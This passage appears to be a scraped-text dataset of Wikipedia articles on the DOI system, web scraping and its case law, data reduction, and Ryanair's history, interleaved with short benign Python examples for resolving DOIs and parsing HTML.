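    response.raise_for_status()
    return response.url   # final URL after redirects

print(resolve_doi("10.1000/182"))   # the DOI Handbook example from the text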
The International DOI Foundation (IDF), a non-profit organisation created in 1997, is the governance body of the DOI system. 35 It safeguards all intellectual property rights relating to the DOI system, manages common operational features, and supports the development and promotion of the DOI system. The IDF ensures that any improvements made to the DOI system (including creation, maintenance, registration, resolution and policymaking of DOI names) are available to any DOI registrant. It also prevents third parties from imposing additional licensing requirements beyond those of the IDF on users of the DOI system. The IDF is controlled by a Board elected by the members of the Foundation, with an appointed Managing Agent who is responsible for co-ordinating and planning its activities. Membership is open to all organizations with an interest in electronic publishing and related enabling technologies. The IDF holds annual open meetings on the topics of DOI and related issues. Registration agencies, appointed by the IDF, provide services to DOI registrants: they allocate DOI prefixes, register DOI names, and provide the necessary infrastructure to allow registrants to declare and maintain metadata and state data. Registration agencies are also expected to actively promote the widespread adoption of the DOI system, to cooperate with the IDF in the development of the DOI system as a whole, and to provide services on behalf of their specific user community. A list of current RAs is maintained by the International DOI Foundation. The IDF is recognized as one of the federated registrars for the Handle System by the DONA Foundation (of which the IDF is a board member), and is responsible for assigning Handle System prefixes under the top-level 10 prefix. 36 Registration agencies generally charge a fee to assign a new DOI name; parts of these fees are used to support the IDF. The DOI system overall, through the IDF, operates on a not-for-profit cost recovery basis. The DOI system is an international standard developed by the International Organization for Standardization in its technical committee on identification and description, TC46 SC9. 37 The Draft International Standard ISO DIS 26324, Information and documentation Digital Object Identifier System met the ISO requirements for approval. The relevant ISO Working Group later submitted an edited version to ISO for distribution as an FDIS (Final Draft International Standard) ballot, 38 which was approved by 100% of those voting in a ballot closing on 15 November 2010. 39 The final standard was published on 23 April 2012. 1 DOI is a registered URI under the info URI scheme specified by IETF RFC 4452. info:doi is the infoURI Namespace of Digital Object Identifiers. 40 The DOI syntax is a NISO standard, first standardized in 2000, ANSI NISO Z39.84 2005 Syntax for the Digital Object Identifier. 41 The maintainers of the DOI system have deliberately not registered a DOI namespace for URNs, stating that: URN architecture assumes a DNS-based Resolution Discovery Service (RDS) to find the service appropriate to the given URN scheme. However no such widely deployed RDS schemes currently exist.... DOI is not registered as a URN namespace, despite fulfilling all the functional requirements, since URN registration appears to offer no advantage to the DOI System. 
It requires an additional layer of administration for defining DOI as a URN namespace (the string urn:doi:10.1000 1 rather than the simpler doi:10.1000 1) and an additional step of unnecessary redirection to access the resolution service, already achieved through either http proxy or native resolution. If RDS mechanisms supporting URN specifications become widely available, DOI will be registered as a URN. |
583 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#DOM_parsing | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
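Editor's sketch of the two techniques just described: fetching a page over HTTP, then extracting data either with a regular expression or by parsing the DOM tree. It uses the libraries already imported in this notebook (requests, re, BeautifulSoup, urljoin); the target URL is an example only, and the link-matching patterns are assumptions for illustration.

import re
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin

url = "https://en.wikipedia.org/wiki/Web_scraping"   # example target
html = requests.get(url, timeout=10).text

# Regex approach: quick to write, but fragile against markup changes.
href_pattern = re.compile(r'href="(/wiki/[^":#]+)"')
regex_links = href_pattern.findall(html)

# DOM approach: parse the document tree and walk it.
soup = BeautifulSoup(html, "html5lib")
dom_links = [urljoin(url, a["href"])
             for a in soup.find_all("a", href=True)
             if a["href"].startswith("/wiki/")]

print(len(regex_links), len(dom_links))

As a follow-up to the template-driven pages mentioned above, tabular content can often be pulled without hand-written parsing; pandas.read_html (pandas and StringIO are imported in this notebook's setup) returns one DataFrame per <table> on the page. Again, the URL is only an example.

import pandas as pd
from io import StringIO

table_url = "https://en.wikipedia.org/wiki/List_of_HTTP_status_codes"  # example page
table_html = requests.get(table_url, timeout=10).text
tables = pd.read_html(StringIO(table_html))   # list of DataFrames, one per table
print(f"Found {len(tables)} tables; first table shape: {tables[0].shape}")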
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200-300 search requests to QVC's website per minute, sometimes up to 36,000 requests per minute), which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of its website, which QVC claims was caused by Resultly. On the plaintiff's website during the period of this trial, the terms-of-use link was displayed among all the links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA), a uniform law that many believed was in favor of common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned it to the Ninth Circuit to be reconsidered in light of the 2021 Supreme Court decision in Van Buren v. United States, which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld its prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court for the Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
584 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_reduction | Data reduction is the transformation of numerical or alphabetical digital information derived empirically or experimentally into a corrected, ordered, and simplified form. The purpose of data reduction can be two-fold: reduce the number of data records by eliminating invalid data, or produce summary data and statistics at different aggregation levels for various applications. 1 Data reduction does not necessarily mean loss of information. For example, the body mass index reduces two dimensions (body mass and height) into a single measure, without any information being lost in the process. When information is derived from instrument readings, there may also be a transformation from analog to digital form. When the data are already in digital form, the 'reduction' of the data typically involves some editing, scaling, encoding, sorting, collating, and producing tabular summaries. When the observations are discrete but the underlying phenomenon is continuous, smoothing and interpolation are often needed. Data reduction is often undertaken in the presence of reading or measurement errors. Some idea of the nature of these errors is needed before the most likely value may be determined. An example in astronomy is the data reduction in the Kepler satellite. This satellite records 95-megapixel images once every six seconds, generating dozens of megabytes of data per second, which is orders of magnitude more than the downlink bandwidth of 550 kB/s. The on-board data reduction encompasses co-adding the raw frames for thirty minutes, reducing the bandwidth by a factor of 300. Furthermore, interesting targets are pre-selected and only the relevant pixels are processed, which is 6% of the total. This reduced data is then sent to Earth, where it is processed further. Research has also been carried out on the use of data reduction in wearable (wireless) devices for health monitoring and diagnosis applications. For example, in the context of epilepsy diagnosis, data reduction has been used to increase the battery lifetime of a wearable EEG device by selecting and only transmitting EEG data that is relevant for diagnosis and discarding background activity. 2 When dimensionality increases, data becomes increasingly sparse, while density and distance between points, critical to clustering and outlier analysis, become less meaningful. Dimensionality reduction helps reduce noise in the data and allows for easier visualization, such as when 3-dimensional data is transformed into 2 dimensions to reveal structure that would otherwise stay hidden. One method of dimensionality reduction is the wavelet transform, in which data is transformed to preserve relative distance between objects at different levels of resolution; it is often used for image compression. 3 Numerosity reduction reduces the data volume by choosing alternate, smaller forms of data representation. It can be split into two groups: parametric and non-parametric methods. Parametric methods (regression, for example) assume the data fits some model, estimate the model parameters, store only the parameters, and discard the data. In this way, the volume of data to be processed is reduced based on more specific criteria. Another example would be a log-linear model, obtaining a value at a point in m-D space as the product of appropriate marginal subspaces. 
Non-parametric methods do not assume a model; examples include histograms, clustering, and sampling. 4 Data reduction can be obtained by assuming a statistical model for the data. Classical principles of data reduction include sufficiency, likelihood, conditionality, and equivariance. 5 |
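As a rough, self-contained illustration of the parametric and non-parametric numerosity reduction ideas described above, here is a small sketch. The data and column names are synthetic, invented purely for this example.
# Illustrative numerosity reduction on synthetic data (not from any source above).
# Parametric: fit a straight line and keep only its two coefficients.
# Non-parametric: keep a small random sample and a 10-bin histogram summary.
import numpy as np
import pandas as pd

rng = np.random.default_rng(0)
x = np.arange(1000, dtype=float)
y = 3.0 * x + 5.0 + rng.normal(scale=10.0, size=x.size)
df = pd.DataFrame({"x": x, "y": y})

# Parametric reduction: 1000 rows -> 2 stored numbers (slope, intercept)
slope, intercept = np.polyfit(df["x"], df["y"], deg=1)

# Non-parametric reduction: a 5% random sample and a histogram of y
sample = df.sample(frac=0.05, random_state=0)
counts, bin_edges = np.histogram(df["y"], bins=10)

print(f"Kept parameters: slope={slope:.2f}, intercept={intercept:.2f}")
print(f"Kept sample rows: {len(sample)} of {len(df)}")
print(f"Histogram bin counts: {counts.tolist()}")
Either summary can stand in for the full table in downstream processing, trading detail for a much smaller data volume.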
586 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Ryanair | Ryanair is an Irish ultra low-cost carrier group headquartered in Swords, Dublin, Ireland. 12 The parent company Ryanair Holdings plc includes subsidiaries Ryanair DACTooltip Designated activity company, 13 Malta Air, Buzz, Lauda Europe and Ryanair UK. Ryanair DAC, the oldest airline of the group, was founded in 1984. 11 Ryanair Holdings was established in 1996 as a holding company for Ryanair with the two companies having the same board of directors and executive officers. 14 In 2019 the transition began from the airline Ryanair and its subsidiaries into separate sister airlines under the holding company. 15 Later in 2019 Malta Air joined Ryanair Holdings. 16 Ryanair has been characterised by its rapid expansion, a result of the deregulation of the aviation industry in Europe in 1997 and the success of its low-cost business model. The group operates more than 500 planes. 17 Its route network serves over 40 countries in Europe, North Africa (Morocco, Canary Islands), and the Middle East (Israel and Jordan). 18 The primary operational bases are at Dublin, London Stansted and Milan Bergamo airports. 19 Ryanair is Ireland's biggest airline 20 and in 2016 became the world's largest airline by scheduled international passengers. 21 The company has at times been criticised for its refusal to issue invoices for the VAT-exempt services it provides (airfares), 22 poor working conditions, 23 24 25 heavy use of extra charges, 26 27 28 poor customer service, 29 30 and tendency to intentionally generate controversy in order to gain publicity. 31 32 33 Since its establishment in 1984, 11 Ryanair has grown from a small airline, flying the short journey from Waterford to London Gatwick, into Europe's largest carrier. There have been over 19,000 people working for the company, most employed and contracted by agencies to fly on Ryanair aircraft. 34 35 The airline went public in 1997, 36 and the money raised was used to expand the airline into a pan-European carrier. Revenues have risen from 640 million in 2003 to 4.66 billion in 2010. 37 Similarly, net profits have increased from 48 million to 339 million over the same period. 38 Ryanair was founded in 1984 as "Danren Enterprises" 11 by Christopher Ryan, Liam Lonergan (owner of Irish travel agent Club Travel), and Irish businessman Tony Ryan, founder of Guinness Peat Aviation. 39 40 The airline was shortly renamed "Ryanair". 11 It began operations in 1985 flying a 15 seat Embraer Bandeirante turboprop aircraft between Waterford and Gatwick Airport. 41 42 The first chief executive was Eugene O'Neill (1956 2018), who had formerly worked as managing director of Ryan's Sunday Tribune newspaper and as Ryan's personal assistant. O'Neill was talented at marketing but did not focus on costs, and the airline lost money in its early years. Ryan vetoed O'Neill's proposal to take Aer Lingus to the European Commission for breach of competition rules, because at the time Aer Lingus was state-owned and Ryanair depended on the Irish government for its route licences. 43 44 Ryan sacked O'Neill in September 1987, who sued for wrongful dismissal. 43 In 1986, the company added a second route from Dublin to Luton, thus directly competing with the Aer Lingus British Airways duopoly for the first time. 
Under partial European Economic Community (EEC) deregulation, airlines could begin new international intra-EEC services as long as one of the two governments approved (the so-called "double-disapproval" regime). The Irish government at the time refused its approval to protect Aer Lingus, but Britain, under Margaret Thatcher's deregulating Conservative government, approved the service. With two routes and two aircraft, the fledgling airline carried 82,000 passengers in one year. 45 44 46 In 1986, the directors of Ryanair took an 85% stake in London European Airways. From 1987, this provided a connection with the Luton Ryanair service onward to Amsterdam and Brussels. 47 In 1988, London European operated as Ryanair Europe and later began to operate charter services. 48 49 That same year, Michael O'Leary joined the company as chief financial officer. 50 In 1989, a Short Sandringham was operated with Ryanair sponsorship titles but never flew revenue-generating services for the airline. 51 Due to decreasing profits, the company restructured in 1990, copying the low-fares model of Southwest Airlines, after O'Leary visited the company. 50 In 1992, the European Union's deregulation of the air industry in Europe gave carriers from one EU country the right to operate scheduled services between other EU states and represented a major opportunity for Ryanair. 52 After a successful flotation on the Dublin and the NASDAQ stock exchanges, the airline launched services to Stockholm, Sandefjord Airport, Torp (110 km south of Oslo), Beauvais Till northwest of Paris, and Charleroi near Brussels. 53 In 1998, flush with new capital, the airline placed a massive US$2 bn order for 45 new Boeing 737 800 series aircraft. 54 In 1994, Michael O'Leary became the sixth chief executive officer. 55 Ryan clashed with O'Leary, with Ryan wanting the airline's PR stunts to be less aggressive, and O'Leary suggesting that Ryan should leave the board. 56 The airline launched its website in 2000, with online booking initially said to be a small and unimportant part of the software supporting the site. Increasingly online booking contributed to the aim of cutting flight prices by selling directly to passengers and excluding the costs imposed by travel agents. Within a year, the website was handling three-quarters of all bookings. By December 2023 the website hit 40M monthly visits. 57 Ryanair launched a new base of operation in Charleroi Airport in 2001. Later that year, the airline ordered 155 new 737 800 aircraft from Boeing at what was believed to be a substantial discount, to be delivered over eight years from 2002 to 2010. 58 Approximately 100 of these aircraft had been delivered by the end of 2005, although there were slight delays in late 2005 caused by production disruptions arising from a Boeing machinists' strike. 59 In April 2003, Ryanair acquired its ailing competitor Buzz from KLM. 60 During 2004, Michael O'Leary warned of a "bloodbath" during the winter from which only two or three low-cost airlines would emerge, the expectation is that these would be Ryanair and EasyJet. 61 A loss of 3.3 million in the second quarter of 2004 was the airline's first recorded loss for 15 years but the airline became profitable soon after. The enlargement of the European Union on 1 May 2004 opened the way to more new routes for Ryanair. 62 The rapid addition of new routes and new bases has enabled growth in passenger numbers and made Ryanair among the largest carriers on European routes. 
In August 2005, the airline claimed to have carried 20% more passengers within Europe than British Airways. 63 For the six months ending on 30 September 2006, passenger traffic grew by more than a fifth to 22.1 million passengers and revenues rose by a third to 1.256 billion. 64 On 13 February 2006, Britain's Channel 4 broadcast a documentary as part of its Dispatches series, "Ryanair caught napping". The documentary criticised Ryanair's training policies, security procedures and aircraft hygiene, and highlighted poor staff morale. Ryanair denied the allegations 65 and claimed that promotional materials, in particular a photograph of a stewardess sleeping, had been faked by Dispatches. 66 On 5 October 2006, Ryanair launched a 1.48 billion ( 1 billion; $1.9 billion) bid to buy fellow Irish flag carrier Aer Lingus. On 5 October 2006, Aer Lingus rejected Ryanair's takeover bid, saying it was contradictory. 67 Ryanair's CEO, Michael O'Leary, stated in April 2007 that Ryanair planned to launch a new long-haul airline around 2009. 68 The new airline would be separate from Ryanair and operate under different branding. It would offer both low costs with fares starting at 10.00 and a business class service which would be much more expensive, intended to rival airlines like Virgin Atlantic. The new airline would operate from Ryanair's existing bases in Europe to approximately six new bases in the United States. The new American bases will not be main bases such as New York's JFK airport, but smaller airports located outside major cities. Since the Boeing 787 was sold out of production until at least 2012, and the Airbus A350 XWB will not enter service until 2014, this contributed to a delay in the airline's launch. It was said that the name of the new airline would be RyanAtlantic and it would sell tickets through the Ryanair website under an alliance agreement. 69 In February 2010, O'Leary said the launch would be delayed until 2014, at the earliest, because of the shortage of suitable, cheap aircraft. 70 71 In August 2007, the company started charging passengers to check in at the airport, therefore reversing its policy of paying for online check-in. It says that cutting airport check-in reduces overhead costs. 72 73 In October 2008, Ryanair withdrew operations from a base in Europe for the first time when it closed its base in Valencia, Spain. 74 Ryanair estimated the closure cost 750 jobs. 75 On 1 December 2008, Ryanair launched a second takeover bid of Aer Lingus, offering an all-cash offer of 748 million ( 619 mils; US$950 million). The offer was a 28% premium on the value of Aer Lingus stock, during the preceding 30 days. Ryanair said, "Aer Lingus, as a small, stand-alone, regional airline, has been marginalised and bypassed, as most other EU flag carriers consolidate. The two airlines would operate separately. Ryanair stated it would double the Aer Lingus short-haul fleet from 33 to 66 and create 1,000 new jobs. 76 77 78 The Aer Lingus board rejected the offer and advised its shareholders to take no action. 79 On 22 January 2009, Ryanair walked away from the Aer Lingus takeover bid after it was rejected by the Irish government on the grounds it undervalued the airline and would harm competition. 80 However, Ryanair retained a stake in Aer Lingus; in October 2010, competition regulators in the UK opened an inquiry, due to concerns that Ryanair's stake may lead to a reduction in competition. 
81 In 2009, Ryanair announced that it was in talks with Boeing and Airbus about an order that could include up to 200 aircraft. Even though Ryanair had dealt with Boeing aircraft up to that point, Michael O'Leary said he would buy Airbus aircraft if it offered a better deal. Airbus Chief Commercial Officer John Leahy denied in February 2009 that any negotiations were taking place. 82 On 21 February 2009, Ryanair confirmed it was planning to close all check-in desks by the start of 2010. Michael O'Leary, Ryanair's chief executive, said passengers would be able to leave their luggage at a bag drop, but everything else would be done online. This became reality in October 2009. 83 In June 2009, Ryanair reported its first annual loss, with a loss posted of 169 million for the financial year ending 31 March. 84 In November 2009, Ryanair announced that negotiations with Boeing had proceeded poorly and that Ryanair was thinking of stopping the negotiations, then putting at 200 aircraft for delivery between 2013 and 2016, and simply returning cash to shareholders. 85 Boeing's competitor Airbus was mentioned again as an alternative vendor for Ryanair, but both Michael O'Leary and Airbus CCO John Leahy dismissed this. 86 In December 2009, Ryanair confirmed that negotiations with Boeing had indeed failed. Plans were to take all 112 aircraft already on order at that point, with the last deliveries occurring in 2012, for a total fleet of over 300. Ryanair confirmed that an agreement had been met on price, but it had failed to agree on conditions, as Ryanair had wanted to carry forward certain conditions from its previous contract. 87 In April 2010, after a week of flight disruption in Europe caused by the 2010 eruptions of Eyjafjallaj kull in Iceland, Ryanair decided to end refusals to comply with EU regulations which stated it was obliged to reimburse stranded passengers. 88 In a company statement released on 22 April 2010, Ryanair described the regulations as 'unfair'. On 29 April 2010, Ryanair cancelled all of its routes from Budapest Liszt Ferenc Airport after talks with the airport's management on reducing fees failed. As the airport is the only one serving Budapest, there is no lower-cost airport nearby. In June 2010, Ryanair called for the Irish government to scrap its tourist tax, implying it was destroying tourism in Ireland. 89 In August 2010, Ryanair held a press conference in Plovdiv and announced its first-ever Bulgarian destination connecting Plovdiv with London Stansted. The service was planned to start in November 2010 with two flights weekly. 90 In late 2010, Ryanair began withdrawing all routes from its smallest base, Belfast City, and Shannon due to increased airport fees. 91 In the last three months of 2010, Ryanair made a loss of 10.3 million, compared with a loss of 10.9 million in the same period the previous year. More than 3,000 flights were cancelled in the quarter. Ryanair blamed the losses on strikes and flight cancellations due to severe weather. 92 In March 2011, Ryanair opened a new maintenance hangar at Glasgow Prestwick International Airport, making it Ryanair's biggest fleet maintenance base. In June 2011, Ryanair and COMAC signed an agreement to cooperate on the development of the C 919, a Boeing 737 competitor. 93 Ryanair cut capacity by grounding 80 aircraft between November 2011 and April 2012 due to the high cost of fuel and continuing weak economic conditions. 
94 On 19 June 2012, Ryanair Chief Executive Michael O'Leary announced his intention to make an all-cash offer for Aer Lingus. The bid was blocked by the European Commission in 2017, which had also blocked an earlier bid. 95 According to research in October 2013, Ryanair was the cheapest low-cost airline in Europe in basic price (excluding fees) but was the fourth cheapest when fees were included. 96 97 On 25 October 2013, Ryanair announced what it described as a series of "customer service improvements", to take place over the next six months. These included lower fees for reprinting boarding passes, free changes of minor errors on bookings within 24 hours, and a free second small carry-on bag. Ryanair said it was making the changes as a result of customer feedback. 98 On 27 January 2014, Ryanair moved into a new 20m, 100,000 sq ft Dublin head office in Airside Business Park, having outgrown its previous office within Dublin Airport. 99 The building was officially opened on Thursday 3 April 2014 by the then Taoiseach Enda Kenny, Minister for Finance Michael Noonan and the Lord Mayor of Dublin Oisin Quinn. On 8 September 2014, Ryanair agreed to purchase up to 200 Boeing 737 MAX 8s (100 confirmed and 100 options) for over $22 billion. 100 The airline confirmed plans to open an operating base at Milan Malpensa Airport in December 2015, initially with one aircraft. 101 On 9 March 2016, Ryanair launched a corporate jet charter service, offering a Boeing 737 700 for corporate or group hire. 102 103 In November 2016, Ryanair launched a new package holiday service named Ryanair Holidays. The new service offers flights, accommodation, and transfer packages. The service was launched in Ireland, the United Kingdom and Germany, with other markets to follow. 104 Ryanair partnered with Spain-based tour operator, Logitravel, and accommodation provider, World2Meet, to create Ryanair Holidays. 105 In April 2017, Ryanair started issuing tickets for connecting flights, meaning if a connection is missed, the customer will be rebooked at no extra cost and compensated according to the EU Flight Compensation Regulation. To begin with, such tickets were only sold for flights with connections at Rome-Fiumicino airport. 106 107 In 2017, the company announced plans to add 50 new aircraft to its fleet every year for the next five years, aiming to reach 160 